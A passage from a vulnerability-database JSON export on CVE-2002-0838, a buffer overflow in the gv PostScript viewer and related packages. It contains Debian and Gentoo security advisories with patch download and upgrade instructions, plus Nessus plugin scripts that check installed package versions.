http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2002-10-16T00:00:00", "published": "2002-10-16T00:00:00", "id": "DEBIAN:DSA-176-1:0B654", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00099.html", "title": "[SECURITY] [DSA 176-1] New gv packages fix buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:57", "bulletinFamily": "unix", "cvelist": ["CVE-2002-0838"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 182-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 28th, 2002 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kdegraphics\nVulnerability : buffer overflow\nProblem-Type : 
remote\nDebian-specific: no\nCVE Id : CAN-2002-0838\nBugTraq ID : 5808\n\nZen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in kghostview which is part\nof the KDE-Graphics package. This problem is triggered by scanning\nthe PostScript file and can be exploited by an attacker sending a\nmalformed PostScript or PDF file. The attacker is able to cause\narbitrary code to be run with the privileges of the victim.\n\nThis problem has been fixed in version 2.2.2-6.8 for the current\nstable distribution (woody) and in version 2.2.2-6.9 for the unstable\ndistribution (sid). The old stable distribution (potato) is not\naffected since no KDE is included.\n\nWe recommend that you upgrade your kghostview package.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_2.2.2-6.8.dsc\n Size/MD5 checksum: 978 92a3fa3751c538608857c57a713a9487\n http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_2.2.2-6.8.diff.gz\n Size/MD5 checksum: 59276 fe7f3a7ed39f52457efca69226bccc33\n http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_2.2.2.orig.tar.gz\n Size/MD5 checksum: 1640320 4dc8538c4c8dd8b13ef4f8e62446d777\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_alpha.deb\n Size/MD5 checksum: 165978 fba04ef31acd55249d3df119b6712444\n\n ARM architecture:\n\n 
http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_arm.deb\n Size/MD5 checksum: 146588 b76885389c6d29dbd11db488385b395f\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_i386.deb\n Size/MD5 checksum: 146264 e574c2d69f9392ce94a9a03d1297a218\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_ia64.deb\n Size/MD5 checksum: 197724 9a35cfc75c5672a0ddba1c17a9d9d62e\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_hppa.deb\n Size/MD5 checksum: 171188 0c683f2d0f8f667c93ded25dde41332f\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_m68k.deb\n Size/MD5 checksum: 142828 68fa4e43a0af7a2d024c55da219b99ad\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_mips.deb\n Size/MD5 checksum: 138378 842a9be4b081394452ec550cc564d0b7\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_mipsel.deb\n Size/MD5 checksum: 136866 d884fae95437379052339da29ccc5afd\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_powerpc.deb\n Size/MD5 checksum: 146622 fbf4c9b3164b0a0f3329df556ec722be\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_s390.deb\n Size/MD5 checksum: 146122 eea9e2c0f0bb23303ee0e29e95a6e3e4\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_2.2.2-6.8_sparc.deb\n Size/MD5 checksum: 148240 62902f062d14a4c6a6794d1368be49d4\n\n\n Please note that the source packages mentioned above produce more\n binary packages than the ones listed above. 
They are not relevant\n for the fixed problems, though.\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2002-10-28T00:00:00", "published": "2002-10-28T00:00:00", "id": "DEBIAN:DSA-182-1:BF38F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00105.html", "title": "[SECURITY] [DSA 182-1] New kghostview packages fix buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:01", "bulletinFamily": "unix", "cvelist": ["CVE-2002-0838"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 179-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 18th, 2002 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : gnome-gv\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE Id : CAN-2002-0838\nBugTraq ID : 5808\n\nZen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in gnome-gv. This problem\nis triggered by scanning the PostScript file and can be exploited by\nan attacker sending a malformed PostScript or PDF file. 
The attacker\nis able to cause arbitrary code to be run with the privileges of the\nvictim.\n\nThis problem has been fixed in version 1.1.96-3.1 for the current\nstable distribution (woody), in version 0.82-2.1 for the old stable\ndistribution (potato) and version 1.99.7-9 for the unstable\ndistribution (sid).\n\nWe recommend that you upgrade your gnome-gv package.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1.dsc\n Size/MD5 checksum: 807 82140169547f88c38b9965be1bc9a69c\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1.diff.gz\n Size/MD5 checksum: 8494 103905f14d882282d0e976a29111bbb2\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82.orig.tar.gz\n Size/MD5 checksum: 369538 c4542420f0f7aeafea6764718b398341\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_alpha.deb\n Size/MD5 checksum: 145076 05ebc47d64924740b4a6efced375ed00\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_arm.deb\n Size/MD5 checksum: 131928 44f502cc48717739484999b677b23e52\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_i386.deb\n Size/MD5 checksum: 131118 7d2712b05b78e757568efabee83c9bc0\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_m68k.deb\n Size/MD5 checksum: 126710 38225171738cca0d10b9c1f91313ad0d\n\n 
PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_powerpc.deb\n Size/MD5 checksum: 132002 b3208e369afc8754480f80f6aa2b11c5\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_0.82-2.1_sparc.deb\n Size/MD5 checksum: 136274 156b99fa91b627e91f5e2c3dde50ffc7\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1.dsc\n Size/MD5 checksum: 831 4f3c53098ca78e9532f62778f0cf3b0a\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1.diff.gz\n Size/MD5 checksum: 23903 b33d66f44f186f88829a0537da99d549\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96.orig.tar.gz\n Size/MD5 checksum: 742271 5d80db150adb4bfc5398d8a90ee2f9dd\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_alpha.deb\n Size/MD5 checksum: 340232 87adcdb4e9ef30d25b95734555f3c134\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_arm.deb\n Size/MD5 checksum: 325244 4a5e426144987c2ab8372976ef65c34e\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_i386.deb\n Size/MD5 checksum: 320834 73fc7baeba28750356b628eac22e7ec7\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_ia64.deb\n Size/MD5 checksum: 380740 e814ebf7089f0717e8d86912ed38cf4b\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_hppa.deb\n Size/MD5 checksum: 345956 f9bfa25c891ea680d15e2c68498ba7cc\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_m68k.deb\n Size/MD5 checksum: 314324 dfee84b168b5acc1f2ae7239f7d07f28\n\n Big endian MIPS architecture:\n\n 
http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_mips.deb\n Size/MD5 checksum: 316934 fc8f5c0c4c71b69acce97f7666187f27\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_mipsel.deb\n Size/MD5 checksum: 315270 4d65c8f3619a14e4f0e8df6e8a3c897b\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_powerpc.deb\n Size/MD5 checksum: 322280 4cf75a0c3f3ba1cc625ee6a13009f43a\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_s390.deb\n Size/MD5 checksum: 321032 60c0866b15e838f97fcdb11380d94aea\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/g/gnome-gv/gnome-gv_1.1.96-3.1_sparc.deb\n Size/MD5 checksum: 342248 52513f97ca364ed7978f8050a19c4ef2\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2002-10-18T00:00:00", "published": "2002-10-18T00:00:00", "id": "DEBIAN:DSA-179-1:3F636", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00102.html", "title": "[SECURITY] [DSA 179-1] New gnome-gv packages fix buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:02", "bulletinFamily": "unix", "cvelist": ["CVE-2002-0838"], "description": "### Background\n\ngv is a PostScript and PDF viewer for X which provides a user interface for the ghostscript interpreter. 
\n\n### Description\n\ngv contains a buffer overflow vulnerability where an unsafe sscanf() call is used to interpret PDF and PostScript files. \n\n### Impact\n\nBy enticing a user to view a malformed PDF or PostScript file an attacker could execute arbitrary code with the permissions of the user running gv. \n\n### Workaround\n\nThere is no known workaround at this time. All users are encouraged to upgrade to the latest available version of gv. \n\n### Resolution\n\nAll gv users should upgrade to the latest version: \n \n \n # emerge sync\n \n # emerge -pv \">=app-text/gv-3.5.8-r4\"\n # emerge \">=app-text/gv-3.5.8-r4\"", "edition": 1, "modified": "2004-08-12T00:00:00", "published": "2004-08-12T00:00:00", "id": "GLSA-200408-10", "href": "https://security.gentoo.org/glsa/200408-10", "type": "gentoo", "title": "gv: Exploitable Buffer Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-06T09:45:19", "description": "Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. This problem is triggered by scanning the PostScript\nfile and can be exploited by an attacker sending a malformed\nPostScript or PDF file. The attacker is able to cause arbitrary code\nto be run with the privileges of the victim.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-176-1 : gv - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "p-cpe:/a:debian:debian_linux:gv", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-176.NASL", "href": "https://www.tenable.com/plugins/nessus/15013", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-176. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15013);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_xref(name:\"DSA\", value:\"176\");\n\n script_name(english:\"Debian DSA-176-1 : gv - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. This problem is triggered by scanning the PostScript\nfile and can be exploited by an attacker sending a malformed\nPostScript or PDF file. The attacker is able to cause arbitrary code\nto be run with the privileges of the victim.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2002/dsa-176\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gv package.\n\nThis problem has been fixed in version 3.5.8-26.1 for the current\nstable distribution (woody), in version 3.5.8-17.1 for the old stable\ndistribution (potato) and version 3.5.8-27 for the unstable\ndistribution (sid).\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gv\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"gv\", reference:\"3.5.8-17.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"gv\", reference:\"3.5.8-26.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:45:22", "description": "Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in gnome-gv. This problem is\ntriggered by scanning the PostScript file and can be exploited by an\nattacker sending a malformed PostScript or PDF file. 
The attacker is\nable to cause arbitrary code to be run with the privileges of the\nvictim.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-179-1 : gnome-gv - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:gnome-gv"], "id": "DEBIAN_DSA-179.NASL", "href": "https://www.tenable.com/plugins/nessus/15016", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-179. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15016);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_xref(name:\"DSA\", value:\"179\");\n\n script_name(english:\"Debian DSA-179-1 : gnome-gv - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in gnome-gv. This problem is\ntriggered by scanning the PostScript file and can be exploited by an\nattacker sending a malformed PostScript or PDF file. 
The attacker is\nable to cause arbitrary code to be run with the privileges of the\nvictim.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2002/dsa-179\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gnome-gv package.\n\nThis problem has been fixed in version 1.1.96-3.1 for the current\nstable distribution (woody), in version 0.82-2.1 for the old stable\ndistribution (potato) and version 1.99.7-9 for the unstable\ndistribution (sid).\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gnome-gv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 
(!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"gnome-gv\", reference:\"0.82-2.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"gnome-gv\", reference:\"1.1.96-3.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:45:31", "description": "Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in kghostview which is part\nof the KDE-Graphics package. This problem is triggered by scanning the\nPostScript file and can be exploited by an attacker sending a\nmalformed PostScript or PDF file. The attacker is able to cause\narbitrary code to be run with the privileges of the victim.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-182-1 : kdegraphics - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kdegraphics"], "id": "DEBIAN_DSA-182.NASL", "href": "https://www.tenable.com/plugins/nessus/15019", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-182. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15019);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_xref(name:\"DSA\", value:\"182\");\n\n script_name(english:\"Debian DSA-182-1 : kdegraphics - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in kghostview which is part\nof the KDE-Graphics package. This problem is triggered by scanning the\nPostScript file and can be exploited by an attacker sending a\nmalformed PostScript or PDF file. The attacker is able to cause\narbitrary code to be run with the privileges of the victim.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2002/dsa-182\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the kghostview package.\n\nThis problem has been fixed in version 2.2.2-6.8 for the current\nstable distribution (woody) and in version 2.2.2-6.9 for the unstable\ndistribution (sid). 
The old stable distribution (potato) is not\naffected since no KDE is included.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kdegraphics\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kamera\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kcoloredit\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kfract\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kghostview\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", 
prefix:\"kiconedit\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kooka\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kpaint\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kruler\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"ksnapshot\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kview\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libkscan-dev\", reference:\"2.2.2-6.8\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libkscan1\", reference:\"2.2.2-6.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:17", "description": "A buffer overflow was discovered in gv versions 3.5.8 and earlier by\nZen Parse. The problem is triggered by scanning a file and can be\nexploited by an attacker sending a malformed PostScript or PDF file.\nThis would result in arbitrary code being executed with the privilege\nof the user viewing the file. ggv uses code derived from gv and has\nthe same vulnerability. 
These updates provide patched versions of gv\nand ggv to fix the vulnerabilities.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : gv (MDKSA-2002:069)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "modified": "2004-07-31T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:8.2", "cpe:/o:mandrakesoft:mandrake_linux:8.0", "cpe:/o:mandrakesoft:mandrake_linux:9.0", "p-cpe:/a:mandriva:linux:ggv", "cpe:/o:mandrakesoft:mandrake_linux:8.1", "p-cpe:/a:mandriva:linux:gv"], "id": "MANDRAKE_MDKSA-2002-069.NASL", "href": "https://www.tenable.com/plugins/nessus/13969", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2002:069. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13969);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_xref(name:\"MDKSA\", value:\"2002:069\");\n\n script_name(english:\"Mandrake Linux Security Advisory : gv (MDKSA-2002:069)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow was discovered in gv versions 3.5.8 and earlier by\nZen Parse. The problem is triggered by scanning a file and can be\nexploited by an attacker sending a malformed PostScript or PDF file.\nThis would result in arbitrary code being executed with the privilege\nof the user viewing the file. ggv uses code derived from gv and has\nthe same vulnerability. 
